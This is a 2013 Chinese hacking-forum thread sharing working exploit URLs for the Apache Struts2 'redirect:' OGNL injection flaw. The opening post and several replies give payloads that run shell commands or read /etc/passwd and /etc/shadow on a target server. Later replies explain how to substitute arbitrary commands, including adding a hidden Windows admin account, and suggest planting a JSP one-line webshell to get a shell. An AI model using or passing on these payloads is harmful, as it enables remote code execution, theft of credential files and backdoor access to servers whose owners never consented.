http://www.example.com/struts2-showcase/employee/save.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
1#
基佬 (彩色避孕套,耐磨又耐操,用完还可以吹泡泡~) | 2013-07-17 16:11
前排留名
2#
陌路 | 2013-07-17 16:12
好像已经有人发过了
3#
DragonEgg | 2013-07-17 16:13
@陌路 那个版块木有权限阅读。。
4#
xiaogui | 2013-07-17 16:22
好人一生平安~
5#
hqdvista (...) | 2013-07-17 16:33
发个读文件的
http://xxxx/oooo.action?redirect:${%23b%3dnew java.io.FileInputStream(new java.lang.String('/etc/passwd')),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
6#
whoami (alert\\) | 2013-07-17 16:38
@hqdvista 发个写文件的吧...
7#
飘雪柔情 | 2013-07-17 16:42
@hqdvista 发个写文件的吧
8#
火星人 (不会技术活) | 2013-07-17 16:42
没用,早被和谐了
9#
Ocean | 2013-07-17 17:18
{'calc','goes','here'} 这里Windows下执行命令回显要怎么写??求牛人
10#
菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:13
http://xxxx/oooo.action?redirect:${%23b%3dnew java.io.FileInputStream(new java.lang.String('/etc/shadow')),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
11#
TMaMba | 2013-07-17 18:16
@Ocean {'ipconfig'}
12#
菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:17
root权限怎么读/etc/passwd
13#
菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:19
root权限怎么读/etc/passwd
14#
咖啡 (他依然向往着长岛的雪, 依然向往着潘帕斯的风吟鸟唱) | 2013-07-17 18:19
怎么写啊
15#
中国公民 (拿shell容易,拖库难~) | 2013-07-17 18:22
@菜菜 cat /etc/passwd
16#
ccccshq (一个热爱编程,热爱网络,热爱生活的IT民工) | 2013-07-17 18:41
whoami
17#
小猪 | 2013-07-17 19:02
{'cat','/etc/passwd'} 命令在这里改 第一个参数是可执行文件(当然也可以是ls whoami id之类的命令) 从第二个开始就是传递的参数 比如 ls 你可以直接用{'ls'} 但是ls -l 有了-l这个参数 就得{'ls','-l'}这样分开写 windows的net user给个例子{'net','user','admin$','123456','/add'} 总之一句话 所有空格都给拆开写就没错了 右边感谢 谢谢
18#
FallenAngel (Crow) | 2013-07-17 19:03
空格命令拼接要用,哦
19#
TMaMba | 2013-07-17 19:05
@小猪 windows 有什么办法get shell么
20#
LauRen | 2013-07-17 19:06
,求利用工具,wb感谢
21#
小猪 | 2013-07-17 20:16
@TMaMba 参考1433抓鸡的FTP传马方法 或者直接echo一句话 只不过jsp的一句话比较长。。。
22#
dullub (专业销售变态一句话,你没有听错,998,998,只要998,超级镶钻一句话真的只要998,998,畸形一句话带回家) | 2013-07-17 20:53
- -
一边是刷rank的,一边是刷感谢的:)
23#
B1acken | 2013-07-18 07:31
尼马,感谢要钱,穷B伤不起